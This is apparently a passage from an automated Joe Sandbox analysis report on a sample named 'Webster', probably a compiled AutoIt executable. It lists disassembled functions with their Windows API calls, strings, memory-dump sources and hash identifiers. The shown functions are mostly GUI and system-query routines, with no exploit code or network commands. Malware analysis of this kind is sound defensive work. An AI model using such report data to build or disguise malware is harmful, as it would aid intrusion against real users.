                                                                                    • Part of subcall function 00B0AF18: SetTextColor.GDI32(?,?), ref: 00B0AF55
                                                                                    • Part of subcall function 00B0AF18: GetSysColorBrush.USER32(0000000F), ref: 00B0AF6B
                                                                                    • Part of subcall function 00B0AF18: GetSysColor.USER32(0000000F), ref: 00B0AF76
                                                                                    • Part of subcall function 00B0AF18: GetSysColor.USER32(00000011), ref: 00B0AF93
                                                                                    • Part of subcall function 00B0AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B0AFA1
                                                                                    • Part of subcall function 00B0AF18: SelectObject.GDI32(?,00000000), ref: 00B0AFB2
                                                                                    • Part of subcall function 00B0AF18: SetBkColor.GDI32(?,00000000), ref: 00B0AFBB
                                                                                    • Part of subcall function 00B0AF18: SelectObject.GDI32(?,?), ref: 00B0AFC8
                                                                                    • Part of subcall function 00B0AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00B0AFE7
                                                                                    • Part of subcall function 00B0AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B0AFFE
                                                                                    • Part of subcall function 00B0AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00B0B013
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                  • String ID:
                                                                                  • API String ID: 4124339563-0
                                                                                  • Opcode ID: 91461a6ddfcfaa62fad0c9bc655a092181c0bc6eae286d9b63a5e8b318dfaea6
                                                                                  • Instruction ID: 00923177e3e71bed276506ed193d79f4811bfb9dbda4e6a0de3a3b227b148044
                                                                                  • Opcode Fuzzy Hash: 91461a6ddfcfaa62fad0c9bc655a092181c0bc6eae286d9b63a5e8b318dfaea6
                                                                                  • Instruction Fuzzy Hash: EEA16E71018305AFD711AF64DC48AAB7BE9FF88321F508A19F562971E0DB74D984CF52
                                                                                  Function 00A82FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(?,?,?), ref: 00A83072
                                                                                  • DeleteObject.GDI32(00000000), ref: 00A830B8
                                                                                  • DeleteObject.GDI32(00000000), ref: 00A830C3
                                                                                  • DestroyIcon.USER32(00000000,?,?,?), ref: 00A830CE
                                                                                  • DestroyWindow.USER32(00000000,?,?,?), ref: 00A830D9
                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00ABC77C
                                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00ABC7B5
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00ABCBDE
                                                                                    • Part of subcall function 00A81F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A82412,?,00000000,?,?,?,?,00A81AA7,00000000,?), ref: 00A81F76
                                                                                  • SendMessageW.USER32(?,00001053), ref: 00ABCC1B
                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00ABCC32
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ABCC48
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ABCC53
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                  • String ID: 0
                                                                                  • API String ID: 464785882-4108050209
                                                                                  • Opcode ID: b0ef2d8482f247ada9062d37245fd64cf29ddf8f585f3a9a000c1ca58165317b
                                                                                  • Instruction ID: 2871afd0d1ea0291c86677ecf8450749538d34708276429bb49449e1a896046c
                                                                                  • Opcode Fuzzy Hash: b0ef2d8482f247ada9062d37245fd64cf29ddf8f585f3a9a000c1ca58165317b
                                                                                  • Instruction Fuzzy Hash: A6129C31604201EFDB25EF24C884FE9BBB9BF08721F548569E495CB262CB71ED81CB91
                                                                                  Function 00A927FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                                  • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                  • API String ID: 2660009612-1645009161
                                                                                  • Opcode ID: 09ebec326c79f016d007c4f7e1cfb0006d837fa3806722325d2c49a0fd60970c
                                                                                  • Instruction ID: c9b3b5182aaed591879e55c987b62cecb946e5c7a486a5ad104d1202b6b238b3
                                                                                  • Opcode Fuzzy Hash: 09ebec326c79f016d007c4f7e1cfb0006d837fa3806722325d2c49a0fd60970c
                                                                                  • Instruction Fuzzy Hash: 37A18931B00209BBCF24AF61DE92FAE37F9AF45B40F104069F905AB292EB719E51D750
                                                                                  Function 00AF7B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(00000000), ref: 00AF7BC8
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00AF7C87
                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00AF7CC5
                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00AF7CD7
                                                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00AF7D1D
                                                                                  • GetClientRect.USER32(00000000,?), ref: 00AF7D29
                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00AF7D6D
                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AF7D7C
                                                                                  • GetStockObject.GDI32(00000011), ref: 00AF7D8C
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00AF7D90
                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00AF7DA0
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AF7DA9
                                                                                  • DeleteDC.GDI32(00000000), ref: 00AF7DB2
                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00AF7DDE
                                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00AF7DF5
                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00AF7E30
                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00AF7E44
                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00AF7E55
                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00AF7E85
                                                                                  • GetStockObject.GDI32(00000011), ref: 00AF7E90
                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00AF7E9B
                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00AF7EA5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                  • API String ID: 2910397461-517079104
                                                                                  • Opcode ID: e0f457c391cc9530bd42e596be0a835369e8b96f5c34284be5fce8249251012f
                                                                                  • Instruction ID: 82f24ce6b36eb959efe7282ec7d40e0236b2b32ffa10f3af7059aa1028cd10d3
                                                                                  • Opcode Fuzzy Hash: e0f457c391cc9530bd42e596be0a835369e8b96f5c34284be5fce8249251012f
                                                                                  • Instruction Fuzzy Hash: D8A185B1A50219BFEB14DBA4DD4AFAE77B9EB05710F008114FA15A72E0DBB0AD41CF60
                                                                                  Function 00AEB353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00AEB361
                                                                                  • GetDriveTypeW.KERNEL32(?,00B12C4C,?,\\.\,00B10980), ref: 00AEB43E
                                                                                  • SetErrorMode.KERNEL32(00000000,00B12C4C,?,\\.\,00B10980), ref: 00AEB59C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$DriveType
                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                  • API String ID: 2907320926-4222207086
                                                                                  • Opcode ID: e5532da2fa1e258f21d99ab3df6d90dcf5f1bc30737dde0d6f6c3e073477345b
                                                                                  • Instruction ID: 4f7a6a2a3d0ed308edb88c4479b17b6f605fa0690d9eebca24c13649feb0ee66
                                                                                  • Opcode Fuzzy Hash: e5532da2fa1e258f21d99ab3df6d90dcf5f1bc30737dde0d6f6c3e073477345b
                                                                                  • Instruction Fuzzy Hash: 81517430B6425AEBCB00EB62CA4AD7E77F0EB44740F344156E507A72A1DB71AE41CB71
                                                                                  Function 00B0A041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00B0A0F7
                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00B0A1B0
                                                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 00B0A1CC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window
                                                                                  • String ID: 0
                                                                                  • API String ID: 2326795674-4108050209
                                                                                  • Opcode ID: 61a5b68d2d3f00b51492db18d1e099f8fa2cb827c8922c9141d01fa732c2c807
                                                                                  • Instruction ID: c5a6ccf8254d4483ff26d8247af4acff6fd3a5df90e037060b487a0fad2c2989
                                                                                  • Opcode Fuzzy Hash: 61a5b68d2d3f00b51492db18d1e099f8fa2cb827c8922c9141d01fa732c2c807
                                                                                  • Instruction Fuzzy Hash: 2E02BB30108301AFDB25CF14C888BAABFE5FF95714F048AA9F995972E1CB75D944CB92
                                                                                  Function 00B0AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000012), ref: 00B0AF51
                                                                                  • SetTextColor.GDI32(?,?), ref: 00B0AF55
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00B0AF6B
                                                                                  • GetSysColor.USER32(0000000F), ref: 00B0AF76
                                                                                  • CreateSolidBrush.GDI32(?), ref: 00B0AF7B
                                                                                  • GetSysColor.USER32(00000011), ref: 00B0AF93
                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B0AFA1
                                                                                  • SelectObject.GDI32(?,00000000), ref: 00B0AFB2
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00B0AFBB
                                                                                  • SelectObject.GDI32(?,?), ref: 00B0AFC8
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00B0AFE7
                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B0AFFE
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B0B013
                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B0B05F
                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B0B086
                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00B0B0A4
                                                                                  • DrawFocusRect.USER32(?,?), ref: 00B0B0AF
                                                                                  • GetSysColor.USER32(00000011), ref: 00B0B0BD
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00B0B0C5
                                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B0B0D9
                                                                                  • SelectObject.GDI32(?,00B0AC1F), ref: 00B0B0F0
                                                                                  • DeleteObject.GDI32(?), ref: 00B0B0FB
                                                                                  • SelectObject.GDI32(?,?), ref: 00B0B101
                                                                                  • DeleteObject.GDI32(?), ref: 00B0B106
                                                                                  • SetTextColor.GDI32(?,?), ref: 00B0B10C
                                                                                  • SetBkColor.GDI32(?,?), ref: 00B0B116
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                  • String ID:
                                                                                  • API String ID: 1996641542-0
                                                                                  • Opcode ID: 823999f78c0eebcf981b779d4d3e4ad28e6d31a9f5d328284f604c87f8e2842e
                                                                                  • Instruction ID: a7d4ce77543014a0b156f10b821ae3b76ec6ea42996faa239e4190f23a563527
                                                                                  • Opcode Fuzzy Hash: 823999f78c0eebcf981b779d4d3e4ad28e6d31a9f5d328284f604c87f8e2842e
                                                                                  • Instruction Fuzzy Hash: C6613B71910219BFDB11AFA4DC48EEE7BB9EB08320F108555F915AB2E1DBB59980CF90
                                                                                  Function 00B08FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B090EA
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B090FB
                                                                                  • CharNextW.USER32(0000014E), ref: 00B0912A
                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B0916B
                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B09181
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B09192
                                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B091AF
                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00B091FB
                                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B09211
                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B09242
                                                                                  • _memset.LIBCMT ref: 00B09267
                                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B092B0
                                                                                  • _memset.LIBCMT ref: 00B0930F
                                                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B09339
                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B09391
                                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00B0943E
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00B09460
                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B094AA
                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B094D7
                                                                                  • DrawMenuBar.USER32(?), ref: 00B094E6
                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00B0950E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                  • String ID: 0
                                                                                  • API String ID: 1073566785-4108050209
                                                                                  • Opcode ID: 636d042fed8df5c1724cd31b6e2746cdc711a347f528ff7797a7dd90cc8e7d79
                                                                                  • Instruction ID: 42463776398d9117926677a1a593c9c63de6cbc95298c955442971c0895fd75f
                                                                                  • Opcode Fuzzy Hash: 636d042fed8df5c1724cd31b6e2746cdc711a347f528ff7797a7dd90cc8e7d79
                                                                                  • Instruction Fuzzy Hash: 2CE16C71904209AEDF219F55CC84EEE7FB8EF09710F508196F915AB2D2DB708A81DF61
                                                                                  Function 00B04ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCursorPos.USER32(?), ref: 00B05007
                                                                                  • GetDesktopWindow.USER32 ref: 00B0501C
                                                                                  • GetWindowRect.USER32(00000000), ref: 00B05023
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B05085
                                                                                  • DestroyWindow.USER32(?), ref: 00B050B1
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B050DA
                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B050F8
                                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B0511E
                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00B05133
                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B05146
                                                                                  • IsWindowVisible.USER32(?), ref: 00B05166
                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B05181
                                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B05195
                                                                                  • GetWindowRect.USER32(?,?), ref: 00B051AD
                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00B051D3
                                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00B051ED
                                                                                  • CopyRect.USER32(?,?), ref: 00B05204
                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00B0526F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                  • String ID: ($0$tooltips_class32
                                                                                  • API String ID: 698492251-4156429822
                                                                                  • Opcode ID: d72afd887108d59d8aaef0d00b9af28c0177d123599115896a29e8e091518db9
                                                                                  • Instruction ID: f2f327beeb3e02acc94ff6c0bf0a2ccbf49ffdaf8419b5b9d171237cf54e2834
                                                                                  • Opcode Fuzzy Hash: d72afd887108d59d8aaef0d00b9af28c0177d123599115896a29e8e091518db9
                                                                                  • Instruction Fuzzy Hash: FCB18870604701AFD714EF64C988B6BBBE5FF88310F008A58F9999B291DB71E845CF92
                                                                                  Function 00AE498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00AE499C
                                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00AE49C2
                                                                                  • _wcscpy.LIBCMT ref: 00AE49F0
                                                                                  • _wcscmp.LIBCMT ref: 00AE49FB
                                                                                  • _wcscat.LIBCMT ref: 00AE4A11
                                                                                  • _wcsstr.LIBCMT ref: 00AE4A1C
                                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00AE4A38
                                                                                  • _wcscat.LIBCMT ref: 00AE4A81
                                                                                  • _wcscat.LIBCMT ref: 00AE4A88
                                                                                  • _wcsncpy.LIBCMT ref: 00AE4AB3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                  • API String ID: 699586101-1459072770
                                                                                  • Opcode ID: cac055957d1609e09f25e4932c5992ca72320b88c6e43414dd27868d66c58bf7
                                                                                  • Instruction ID: 07258db11f5a74668cefa9ca15a40e9a4c9884e3bcb35f67affb2346eb44ca9d
                                                                                  • Opcode Fuzzy Hash: cac055957d1609e09f25e4932c5992ca72320b88c6e43414dd27868d66c58bf7
                                                                                  • Instruction Fuzzy Hash: 3D410472A002047EEB10B7658E47EBF7BBCEF46360F104069FA04A71D2EB74DA5197A5
                                                                                  Function 00A82BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A82C8C
                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00A82C94
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A82CBF
                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00A82CC7
                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00A82CEC
                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A82D09
                                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A82D19
                                                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A82D4C
                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A82D60
                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00A82D7E
                                                                                  • GetStockObject.GDI32(00000011), ref: 00A82D9A
